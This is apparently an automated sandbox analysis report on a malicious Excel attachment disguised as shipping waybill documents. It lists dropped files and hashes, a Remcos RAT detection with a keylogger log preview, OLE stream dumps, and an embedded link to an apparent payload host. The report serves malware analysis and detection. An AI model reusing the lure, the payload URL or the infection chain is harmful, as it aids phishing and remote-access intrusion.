Preview:	..d.i.m. .g.a.m.e.l.a.n. .....g.a.m.e.l.a.n. .=. .o.p.s.o.p.h.a.g.i.a.....c.a.b.i.r.t.o.(.".b.i.s.t.o.r.t.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".l.a.c.h.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".c.a.n.t.o.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".v.u.l.g.o.c.r.a.c.i.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".c.o.i.s.i.c.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".p.o.r.t.e.l.l.o.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.9._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.1.0._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".L._.H.e.l.p.U.r.i.s._.0.1.1._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.

C:\Users\user\AppData\Roaming\sfvnspt.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	620
Entropy (8bit):	3.54678460181496
Encrypted:	false
SSDEEP:	12:6lVtDecmlVXpwhyDlVRYGlVDM501lVIbWwfgpISQdGG:6/tScm/uhG/9/DM501/cWwfmISA
MD5:	257F23341E3F09C91E886D2C235B6BCC
SHA1:	DC80A4A56D26BA6E5AC4553D7A1A6A9F766A0FB1
SHA-256:	147C43AE259839D1A6BB4CCF7D413718BE6C5D42C09CCD459D3A1B99F545372C
SHA-512:	02B11CACEAADEE5C56BE9DBA3B58E76D202EED99E40E1E5B03EBFDC0C1D79D49898552AD9DD8C6FC872D226C62885A1E9F29A72F817ACC282478041B0B687CE6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\sfvnspt.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.0.7./.2.6. .0.7.:.0.2.:.4.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.7./.2.6. .0.7.:.0.2.:.4.9. .O.i.8. .[.R.e.a.d.-.O.n.l.y.]. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.2.0.2.4./.0.7./.2.6. .0.7.:.0.2.:.5.0. .M.i.c.r.o.s.o.f.t. .E.x.c.e.l.].........[.2.0.2.4./.0.7./.2.6. .0.7.:.0.7.:.2.8. .N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.2.0.2.4./.0.7./.2.6. .0.7.:.0.8.:.0.1. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.2.0.2.5./.0.8./.0.3. .2.1.:.2.3.:.3.4. .V.i.e.w. .A.v.a.i.l.a.b.l.e. .N.e.t.w.o.r.k.s.].....

C:\Users\user\Desktop\1E630000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:03:02 2024, Security: 1
Category:	dropped
Size (bytes):	1282560
Entropy (8bit):	7.965072900164381
Encrypted:	false
SSDEEP:	24576:zLwwwwwwwwwwwwwyAqShn3TDcha8XflSJERNxiVMi5X4j34H33JZIYyMTieAuuUn:zeqShnjDcs8XflSmxiVV5X6E5fFAhm
MD5:	7D1E29B303C38B5B1035AC234690241E
SHA1:	F1F13745C4BC573EC8803AF1A0232676FFB11018
SHA-256:	70891C7577266581E3C9580C0170BD3E309B7690C8416D5761A20249FB28078F
SHA-512:	717E1E8A9C49DB5C3B0FF6F59BE0DE3974034403BC63EEE2F0D8259552FB5332A0B2A6459D85B9B1912A3724AA593EA8E843D50D5EAFF8A3DEA19054E9AD491D
Malicious:	false
Preview:	......................>.......................................................................................`...............b.......d.......f.......h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\1E630000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:03:02 2024, Security: 1
Category:	dropped
Size (bytes):	1282560
Entropy (8bit):	7.965072900164381
Encrypted:	false
SSDEEP:	24576:zLwwwwwwwwwwwwwyAqShn3TDcha8XflSJERNxiVMi5X4j34H33JZIYyMTieAuuUn:zeqShnjDcs8XflSmxiVV5X6E5fFAhm
MD5:	7D1E29B303C38B5B1035AC234690241E
SHA1:	F1F13745C4BC573EC8803AF1A0232676FFB11018
SHA-256:	70891C7577266581E3C9580C0170BD3E309B7690C8416D5761A20249FB28078F
SHA-512:	717E1E8A9C49DB5C3B0FF6F59BE0DE3974034403BC63EEE2F0D8259552FB5332A0B2A6459D85B9B1912A3724AA593EA8E843D50D5EAFF8A3DEA19054E9AD491D
Malicious:	true
Preview:	......................>.......................................................................................`...............b.......d.......f.......h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 07:25:48 2024, Security: 1
Entropy (8bit):	7.783576820354422
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls
File size:	1'306'112 bytes
MD5:	9faaa14705ef278b0ccea0f6a9d75764
SHA1:	5cdb4997ed87d11fb6af886f305a7d9a8ef67907
SHA256:	5239cb9dd05e3706e5765c2a397d0a2573b4b72fadaa589415240b09dd41927e
SHA512:	3e1f2df91b0cbc06c22d8f2f7a2bb0a20c9f6a266ab50b15715b58edf903c5ccb4dd4dd2951a3112470d6a85bb539ef372ba8cfdbf2657be2b0cbfa0cac51069
SSDEEP:	24576:0LwwwwwwwwwwwwwyAqShn3TDcha8XflSJERQgiVfiZZ9aA5M0LnFHJ4WxbBsuY:0eqShnjDcs8XflSjgiV6ZZcA5M0LFp47
TLSH:	6A5523B2F981DE2DE457D67019F2D4B65128AD6B2F57C20B331CBB5BAB743A0091331A
File Content Preview:	........................>.......................................................................................a.......j.......l.......n.......p.......r......................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-07-26 06:25:48
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 05 af 2d 97 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . [ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 05 af 5b 8a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 05 af ae df 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 05 af 89 4e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2503503175049815
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . ~ T $ . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD00023562/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD00023562/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00023562/\x5DocumentSummaryInformation, File Type: data, Stream Size: 708

General
Stream Path:	MBD00023562/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	708
Entropy:	3.6235698530352805
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00

Stream Path: MBD00023562/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\347\332\315\316\302\266|vr\264\254\251\233\233\234\333\333\333\374\374\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 103416

General
Stream Path:	MBD00023562/\x5SummaryInformation
CLSID:
File Type:	dBase III DBT, version number 0, next free block index 65534, 1st item "\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\344\330\313\347\332\315\316\302\266\|vr\264\254\251\233\233\234\333\333\333\374\374\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
Stream Size:	103416
Entropy:	2.9436017971193493
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c8 93 01 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 f4 00 00 00

Stream Path: MBD00023562/MBD00021BE1/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD00023562/MBD00021BE1/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00023562/MBD00021BE1/Package, File Type: Microsoft Excel 2007+, Stream Size: 29560

General
Stream Path:	MBD00023562/MBD00021BE1/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	29560
Entropy:	7.779933890562814
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00023562/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 566764

General
Stream Path:	MBD00023562/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	566764
Entropy:	7.936170222318539
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 8 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD00023563/\x1Ole, File Type: data, Stream Size: 344

General
Stream Path:	MBD00023563/\x1Ole
CLSID:
File Type:	data
Stream Size:	344
Entropy:	4.751227760348994
Base64 Encoded:	False
Data ASCII:	. . . . . N c 9 + . . . . . . . . . . . . J . . . y . . . K . F . . . h . t . t . p . : . / . / . h . q . . . a . x . / . O . i . 8 . . . G $ o . . ) ' T . \| " . . M : 1 p . S . . . . . . . . . . . . . . . . . . . 6 . t . 4 . j . 1 . 1 . b . l . l . r . 2 . 9 . u . x . k . t . V . R . i . Q . v . 0 . 9 . u . L . O . b . Q . q . Q . 8 . r . Z . r . d . N . 0 . x . L . 0 . a . v . W . 1 . b . z . f . b . v . 6 . d . p . H . L . 4 . i . A . 0 . J . 4 . f . k . 1 . X . P . t . a . q . t . 5 . X . T . V . s .
Data Raw:	01 00 00 02 1d b1 91 4e 63 95 39 2b 00 00 00 00 00 00 00 00 00 00 00 00 4a 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 46 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00 71 00 2e 00 61 00 78 00 2f 00 4f 00 69 00 38 00 00 00 20 47 a0 24 9e 87 8a 91 a6 6f ab 0c 06 f7 29 27 54 0d 91 7c 22 d2 13 00 4d db c4 3a 31 70 dd 87 f4 d2 f8 53 ff ff ff ff 00 00 00 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 580194

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	580194
Entropy:	7.999337513527129
Base64 Encoded:	True
